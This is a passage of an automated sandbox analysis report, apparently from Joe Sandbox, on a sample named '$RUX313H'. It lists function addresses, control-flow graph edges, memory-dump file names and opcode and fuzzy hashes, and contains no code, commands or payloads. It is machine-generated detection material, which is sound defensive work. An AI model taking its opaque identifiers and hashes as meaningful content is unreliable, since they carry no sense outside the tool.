                                                                            • Part of subcall function 00DF19B0: GetProcAddress.KERNEL32(00000001,CorExitProcess), ref: 00DF19D1
                                                                            • Part of subcall function 00DF19B0: CorExitProcess.MSCOREE(00000000,?,?,00DF19ED,00000000,?,00DF4933,000000FF,0000001E,00000000,00000000,00000000,?,00DF2E9E,00000000,00000000), ref: 00DF19DE
                                                                          • ExitProcess.KERNEL32 ref: 00DF19F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess$AddressHandleModuleProc
                                                                          • String ID:
                                                                          • API String ID: 1002262038-0
                                                                          • Opcode ID: 0d3552001684e91b9bc7e2fae03893b4cb426dfb667951ec5c9594961789cdaa
                                                                          • Instruction ID: f7180767bf67fa60e56c70b71cf684ca20ece86fcb7c3693ea3e4ba6fe775133
                                                                          • Opcode Fuzzy Hash: 0d3552001684e91b9bc7e2fae03893b4cb426dfb667951ec5c9594961789cdaa
                                                                          • Instruction Fuzzy Hash: D1B0923000020CBBCB012F11DC1A8687F29EB00390B008020FA0848231DFB2AA919AE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03421ED8, Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 416 3421ed8-3421ef8 419 3421f06 416->419 420 3421efa-3421f04 416->420 421 3421f0b-3421f0d 419->421 420->421 422 3421f19-3421f3a 421->422 423 3421f0f-3421f18 421->423 426 3421f4f-3421f64 422->426 427 3421f3c-3421f4d 422->427 430 3421f6a-3421f89 426->430 431 342201e-3422036 426->431 427->426 436 3422014-342201d 430->436 437 3421f8f-3421f95 430->437 434 3422038 431->434 435 3422039-3422067 431->435 434->435 441 3422069-342206b 435->441 442 342206d 435->442 437->431 438 3421f9b-3421fb4 437->438 438->431 443 3421fb6-3421fd2 438->443 444 3422070-3422098 441->444 442->444 443->431 447 3421fd4 443->447 455 34220a0-34220ae 444->455 490 3421fd7 call 3421ed8 447->490 491 3421fd7 call 3421ec9 447->491 449 3421fdd-3421fe4 451 3421fe6-3421fea 449->451 452 3421ff7 449->452 451->431 453 3421fec-3421ff5 451->453 454 3421ff9-342200e 452->454 453->454 454->436 454->437 459 34221b2-34221c5 455->459 460 34220b4-34220c0 455->460 461 34221c7-34221cb 459->461 465 34220c6-34220d1 460->465 466 342216b-3422184 460->466 462 34221d6 461->462 463 34221cd 461->463 463->462 469 34220d3-34220e6 465->469 470 34220eb-342210a 465->470 472 3422191 466->472 473 3422186-342218f 466->473 469->461 480 3422124-342213b 470->480 481 342210c-342211f 470->481 475 3422196-342219a 472->475 473->475 478 34221a1-34221ac 475->478 478->459 478->460 485 3422153-3422169 480->485 486 342213d-3422150 480->486 481->461 485->478 486->485 490->449 491->449
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `l
                                                                          • API String ID: 0-379310572
                                                                          • Opcode ID: e7bd40cef43e8c87e8dd563db82c01cbc45d6cf11c3a27f8713175601964be96
                                                                          • Instruction ID: 9f550ff4d68d859592135f5f328615faed7dad878bf916e61b28962d3fe32ff2
                                                                          • Opcode Fuzzy Hash: e7bd40cef43e8c87e8dd563db82c01cbc45d6cf11c3a27f8713175601964be96
                                                                          • Instruction Fuzzy Hash: 4C81E130B102249FCB24DF64E858BAEBBB6BF84300F54C52AD516AF395CBB09C45CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA5A38, Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 492 5ca5a38-5ca5a68 493 5ca5b9a-5ca5bc0 492->493 494 5ca5a6e-5ca5a7a 492->494 498 5ca5bc7-5ca5c14 493->498 497 5ca5a80-5ca5ac4 494->497 494->498 538 5ca5ac6 call 5ca5c80 497->538 539 5ca5ac6 call 5ca5c90 497->539 511 5ca5c78-5ca5c7c 498->511 512 5ca5c16-5ca5c1a 498->512 512->511 513 5ca5c1c-5ca5c74 512->513 513->511 516 5ca5acc-5ca5ace 518 5ca5b3b-5ca5b41 516->518 519 5ca5b43-5ca5b99 518->519 520 5ca5ad0-5ca5ade 518->520 525 5ca5ae0-5ca5b1e 520->525 526 5ca5b21-5ca5b34 520->526 525->526 532 5ca5b3a 526->532 532->518 538->516 539->516
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \l
                                                                          • API String ID: 0-3304691678
                                                                          • Opcode ID: d5f51389cfdaef607a588705dddd48507201754442e78a3935a2312aafe64a6e
                                                                          • Instruction ID: b6f498eacc07d2e9eaf33430116f8f0015da2c214961218fb415c572b51cd397
                                                                          • Opcode Fuzzy Hash: d5f51389cfdaef607a588705dddd48507201754442e78a3935a2312aafe64a6e
                                                                          • Instruction Fuzzy Hash: 4C51AD707006009FDB54DB79C495BAEBBE2EF89218F558569E50AEB7A0DB30ED018B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342CEA0, Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 540 342cea0-342cedb 543 342d0d3-342d14b 540->543 544 342cee1-342cf27 540->544 553 342d0a8-342d0cc 544->553 554 342cf2d-342cf6a 544->554 553->543 558 342cf70-342cf93 554->558 559 342d037-342d04a 554->559 566 342cf95-342cfbb 558->566 567 342cfbe-342cfe0 call 342c720 call 342c7b0 558->567 561 342d051-342d052 559->561 561->553 566->567 575 342cfe2-342cff2 567->575 576 342d04c 567->576 579 342cff4-342cff9 575->579 580 342cffb 575->580 576->561 581 342d000-342d00d 579->581 580->581 585 342d00f call 342d6c8 581->585 586 342d00f call 342d6d8 581->586 582 342d015-342d031 582->558 582->559 585->582 586->582
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: {
                                                                          • API String ID: 0-3358580159
                                                                          • Opcode ID: 901afc4d40285e1f3d3cc1c9a76d84be59b2b2be4f4d0abbe67543c41ef7e3d4
                                                                          • Instruction ID: e39d92c0d31c408af15d880e85405880536ba95bc8930cf8b7a336e47f3b483f
                                                                          • Opcode Fuzzy Hash: 901afc4d40285e1f3d3cc1c9a76d84be59b2b2be4f4d0abbe67543c41ef7e3d4
                                                                          • Instruction Fuzzy Hash: AA719C30A006559FCB14DFA8C480A9EBBF2BF89304F65892AE515EF355DB70AC46CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342CE91, Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 587 342ce91-342ce9c 588 342ceb5-342cedb 587->588 589 342ce9e-342ceb3 587->589 591 342d0d3-342d14b 588->591 592 342cee1-342cf27 588->592 589->588 601 342d0a8-342d0cc 592->601 602 342cf2d-342cf6a 592->602 601->591 606 342cf70-342cf93 602->606 607 342d037-342d04a 602->607 614 342cf95-342cfbb 606->614 615 342cfbe-342cfe0 call 342c720 call 342c7b0 606->615 609 342d051-342d052 607->609 609->601 614->615 623 342cfe2-342cff2 615->623 624 342d04c 615->624 627 342cff4-342cff9 623->627 628 342cffb 623->628 624->609 629 342d000-342d00d 627->629 628->629 633 342d00f call 342d6c8 629->633 634 342d00f call 342d6d8 629->634 630 342d015-342d031 630->606 630->607 633->630 634->630
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: {
                                                                          • API String ID: 0-3358580159
                                                                          • Opcode ID: 67637b38114a9c2f7b83c201dc53325b829c8fdfd76b2af075119a6309cc75a7
                                                                          • Instruction ID: 941670d23333c25f3d324a8fc957c6e62958538c9a9ab0db057596bcbfd41663
                                                                          • Opcode Fuzzy Hash: 67637b38114a9c2f7b83c201dc53325b829c8fdfd76b2af075119a6309cc75a7
                                                                          • Instruction Fuzzy Hash: B2513C74E006199FCB14CFA4C480A9EFBF2BF88304F59856AE915AF354DB71AD46CB84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342C1CF, Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 635 342c1cf-342c232 call 3429fb0 call 342bca0 642 342c234-342c24a 635->642 643 342c279 635->643 646 342c253-342c277 642->646 647 342c24c 642->647 762 342c27e call 342c720 643->762 763 342c27e call 342c711 643->763 764 342c27e call 342c1e8 643->764 765 342c27e call 342c1cf 643->765 644 342c284-342c296 650 342c2cb-342c310 644->650 651 342c298-342c2ad 644->651 646->643 647->646 659 342c6f0-342c73c 650->659 660 342c316-342c325 650->660 760 342c2b0 call 342cea0 651->760 761 342c2b0 call 342ce91 651->761 654 342c2b2-342c2bb call 342f1a0 656 342c2c1-342c2c8 654->656 675 342c748-342c775 659->675 676 342c73e 659->676 663 342c433-342c471 660->663 664 342c32b-342c33a 660->664 692 342c6ed-342c6ef 663->692 668 342c340-342c34f 664->668 669 342c476-342c53e 664->669 678 342c543-342c5dd 668->678 679 342c355-342c364 668->679 669->692 676->675 678->692 686 342c5e2-342c637 679->686 687 342c36a-342c379 679->687 686->692 696 342c37f-342c38e 687->696 697 342c63c-342c6eb 687->697 696->659 707 342c394-342c42e 696->707 697->692 707->692 760->654 761->654 762->644 763->644 764->644 765->644
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: c"
                                                                          • API String ID: 0-2139221276
                                                                          • Opcode ID: de4282f6f66ece5229ddb21abcfef506ca4a1f94b65eaac490dfac939a866b79
                                                                          • Instruction ID: 2604cbb1a66894d2f8ca45fb76750fe473a8e5d8cb017de42aa7335da9fdecd4
                                                                          • Opcode Fuzzy Hash: de4282f6f66ece5229ddb21abcfef506ca4a1f94b65eaac490dfac939a866b79
                                                                          • Instruction Fuzzy Hash: 8F315075B002158FCB05DFA9D49466FBBF6EF88214714856AE405EB314EF34DD06CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03426E42, Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `l
                                                                          • API String ID: 0-379310572
                                                                          • Opcode ID: 1d6bba0b18f7173319d711b9005384917ad1647b08a37519e3176dc8585ae6bc
                                                                          • Instruction ID: 7844bad45b833a090616182e7b358dfafab5db0a163d93c188c27abbdc60c688
                                                                          • Opcode Fuzzy Hash: 1d6bba0b18f7173319d711b9005384917ad1647b08a37519e3176dc8585ae6bc
                                                                          • Instruction Fuzzy Hash: 3E01D4367009255BC214ABB8E04526FB797EBC5564B958D2ED10FCB784DF60EC058392
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342A9B8, Relevance: .5, Instructions: 536COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1676ff7b327c41f9dcd1e0eb8e9a966ce5496e993eeed65a0cd7c78bcf37921b
                                                                          • Instruction ID: 2f5986040044a46ccbb29ac893fa9cb21d058479f3958baeebf01bd1baca6d54
                                                                          • Opcode Fuzzy Hash: 1676ff7b327c41f9dcd1e0eb8e9a966ce5496e993eeed65a0cd7c78bcf37921b
                                                                          • Instruction Fuzzy Hash: 0D228F75B002158FCB10DFA8D484A6EFBF2FF88214B56846AD906EB355DB34ED42CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA3A48, Relevance: .5, Instructions: 462COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 39c5a915a2f770fdf2a46e1b4395f1a1cac320c09f381dfebe4140c90356a272
                                                                          • Instruction ID: 7600aae735690fed31ae608905ce8e5916364239a8d6cbaaa1a0493fadecb0ea
                                                                          • Opcode Fuzzy Hash: 39c5a915a2f770fdf2a46e1b4395f1a1cac320c09f381dfebe4140c90356a272
                                                                          • Instruction Fuzzy Hash: 76124835B002459FCB04DF98C894EAEBBB2FF88314F56C959E505AB2A5DB30EC41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03424610, Relevance: .4, Instructions: 433COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 384f60ad8e96f0be6068a4026205b8ad3ce3d67e89e6057b94cba1af37b3b69b
                                                                          • Instruction ID: d3ff39dd9740b45ef0df7d86d1733c26f843dd836f0305aa2bc5f2f01af524c2
                                                                          • Opcode Fuzzy Hash: 384f60ad8e96f0be6068a4026205b8ad3ce3d67e89e6057b94cba1af37b3b69b
                                                                          • Instruction Fuzzy Hash: 3212AC34A00624CFDB14DF64C894B99BBB2FF89310F2585A9E90AAB350DF35AD85CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03424650, Relevance: .4, Instructions: 412COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8845475a2926d009b74ce8a7b33dd272e9316c2a708ec9c890d5004eb50df355
                                                                          • Instruction ID: b036a5e7491e35582ff459c87c78fd00ea16ac1cc6a0a4d2ee7f71980250ecec
                                                                          • Opcode Fuzzy Hash: 8845475a2926d009b74ce8a7b33dd272e9316c2a708ec9c890d5004eb50df355
                                                                          • Instruction Fuzzy Hash: 28029B34A00625DFDB14DF64C894B99B7B2FF89310F2185A9E90AAB360DF31AD85CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342D8D0, Relevance: .4, Instructions: 361COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f5c7b40c540e3dc02606a053e7113a10ae7ed3b756eb70f2cebdee5ccfe8aea2
                                                                          • Instruction ID: 389524a77abaa41165342ab54e4444dbfe03e252646ba4f3233b3016027f8c78
                                                                          • Opcode Fuzzy Hash: f5c7b40c540e3dc02606a053e7113a10ae7ed3b756eb70f2cebdee5ccfe8aea2
                                                                          • Instruction Fuzzy Hash: 82D18E74B042149FCB08EF69D898A6DBBB2FF89214F54C12AE516EF395DB309C41CB85
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA2830, Relevance: .3, Instructions: 324COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e8e7b5b2806e167abcd477db94e1c94e85661638a85dd645ada1559b7c3e351
                                                                          • Instruction ID: 5a5fec846a14d46420e39ad7e2b2a48e9fca1c43557c7c26d482b0ecfeb5e810
                                                                          • Opcode Fuzzy Hash: 4e8e7b5b2806e167abcd477db94e1c94e85661638a85dd645ada1559b7c3e351
                                                                          • Instruction Fuzzy Hash: FCE16E75A00626CFCB14DF58C4849AEBBF2FF88704B568959D84AAB365DB30FD41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA1579, Relevance: .3, Instructions: 303COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: adc984d4e43637124c122f2b03f3506a759cddefd623d1060f3ff85b947821f8
                                                                          • Instruction ID: 186cd52af2dd49d89537a4a9540734133cb01f4c99a2d2b2b5c9693ac2c22e82
                                                                          • Opcode Fuzzy Hash: adc984d4e43637124c122f2b03f3506a759cddefd623d1060f3ff85b947821f8
                                                                          • Instruction Fuzzy Hash: 96D119756002168FCB04DF58C584DBEBBF6FF84308B968999E4069B2A5DB30FD46CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342F1D8, Relevance: .3, Instructions: 299COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 114c9e7561af354a72e98634debb2002bcc47ec8133ffff31b8ce464c52aeca2
                                                                          • Instruction ID: 1c6162185559bd32a047f576450a8613ed17603f0ba61e93d3c579f3179556fd
                                                                          • Opcode Fuzzy Hash: 114c9e7561af354a72e98634debb2002bcc47ec8133ffff31b8ce464c52aeca2
                                                                          • Instruction Fuzzy Hash: 17B1A174B042108FCB14DB69D894A6EBBF2BFC8210F98C52AE506EF355DB719C46CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 034218D0, Relevance: .3, Instructions: 285COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7e36032b0ef39b247a323565c9c7bad4bffa60971d7e3b4ec272cfd81a4873aa
                                                                          • Instruction ID: c543238a73b9c63de05d1d2bab74181ca420ff34cea3ae172064325bd6a107e5
                                                                          • Opcode Fuzzy Hash: 7e36032b0ef39b247a323565c9c7bad4bffa60971d7e3b4ec272cfd81a4873aa
                                                                          • Instruction Fuzzy Hash: 1FC12834A006148FCB54DF69C884A9DBBF2FF89304F6581A9E50AEB761DB71AD45CF80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 034218E0, Relevance: .3, Instructions: 280COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7f5df697eb3c25d58ea100373a83655905476fc37461d07af6903e096046a51a
                                                                          • Instruction ID: 353e672d249f3dfcc1bd872f484ef524b0b684bf2f3d8e98415346c695fe71c4
                                                                          • Opcode Fuzzy Hash: 7f5df697eb3c25d58ea100373a83655905476fc37461d07af6903e096046a51a
                                                                          • Instruction Fuzzy Hash: 81C12834A006148FCB54DF69C884A9DBBF2FF89704F6581A9E50AEB361DB71AD45CF80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342E288, Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 546fe7c15964bb34cb42fa146aef6fa49890e9a267c09deeb6ce4ae5c6dec21a
                                                                          • Instruction ID: a3fb0938ae893e181e75bb7ad162f8c09f7770e845406182468e2bf17373664c
                                                                          • Opcode Fuzzy Hash: 546fe7c15964bb34cb42fa146aef6fa49890e9a267c09deeb6ce4ae5c6dec21a
                                                                          • Instruction Fuzzy Hash: 49B1D274A002149FCB14DF59C884EAABBF6EF88310F55C45AE915AF3A1DB34EC81CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03429340, Relevance: .3, Instructions: 260COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55f0202929ef3dff0dc0c589e7cf00f152a5cdb659ae7357d587026013709b1e
                                                                          • Instruction ID: ce1fbd8003c7800cb7d7dec64652581b9f86c550d3a1f6b7c75d3a0618646bf6
                                                                          • Opcode Fuzzy Hash: 55f0202929ef3dff0dc0c589e7cf00f152a5cdb659ae7357d587026013709b1e
                                                                          • Instruction Fuzzy Hash: D9A19A71A006149FC724CF68C880A6AFBF6FF88314F588A5AE51A9B751C731FC46CB94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA3360, Relevance: .2, Instructions: 221COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7776ea3a88cf2b65cadde2f5ddea2f3b04606e16890cff44eed713c45f5fe592
                                                                          • Instruction ID: c90a72d666b1b0a58d17f14d3321eb313b0481d5d3ee9b6d90ac54a8058ad3db
                                                                          • Opcode Fuzzy Hash: 7776ea3a88cf2b65cadde2f5ddea2f3b04606e16890cff44eed713c45f5fe592
                                                                          • Instruction Fuzzy Hash: A881AF35B042448FCB18EB79D4A8AADBBF2FF88215B14C869D406EB365DF349D45CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 034285A8, Relevance: .2, Instructions: 213COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e187165dc8783274e5cabe11da799f18c89c98b91489a424e02b51004bc6b74c
                                                                          • Instruction ID: 061a0b2f7be646afd4e95e0da1ab25ce205f2df3112275be779d195eed1ba73c
                                                                          • Opcode Fuzzy Hash: e187165dc8783274e5cabe11da799f18c89c98b91489a424e02b51004bc6b74c
                                                                          • Instruction Fuzzy Hash: FA71A1756002258FC714CF98C884A6EBBF5FF88314B5585AAE819EF761DB30EC01CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA21E0, Relevance: .2, Instructions: 212COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb5ee5536dfdb4b97f31945d685a7552fd57ee24a8f3e46d9833edb9065a10bf
                                                                          • Instruction ID: d15f9baff7a4d8c60b7743fbdef8541ae8df69c698a5e2bfa44d5ce49fb7acf9
                                                                          • Opcode Fuzzy Hash: fb5ee5536dfdb4b97f31945d685a7552fd57ee24a8f3e46d9833edb9065a10bf
                                                                          • Instruction Fuzzy Hash: 2391A435A046158FCB01DF64C8849E9FBF2FF89318B25C5AAD445AB366DB31EC46CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03422350, Relevance: .2, Instructions: 206COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 19d12ef13949bf3d9bf993c7839184f88b9520b54165785390a9e271dce1b7ac
                                                                          • Instruction ID: c820e6fd8c8f680721cd822b89e8d5c807c1411b9dfdd7191b7a9462b65ef00c
                                                                          • Opcode Fuzzy Hash: 19d12ef13949bf3d9bf993c7839184f88b9520b54165785390a9e271dce1b7ac
                                                                          • Instruction Fuzzy Hash: 73A10874A10619CFCB48DFA9D49489DB7B2FF88314721C699E905AB329EB70ED49CF40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342E730, Relevance: .2, Instructions: 205COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
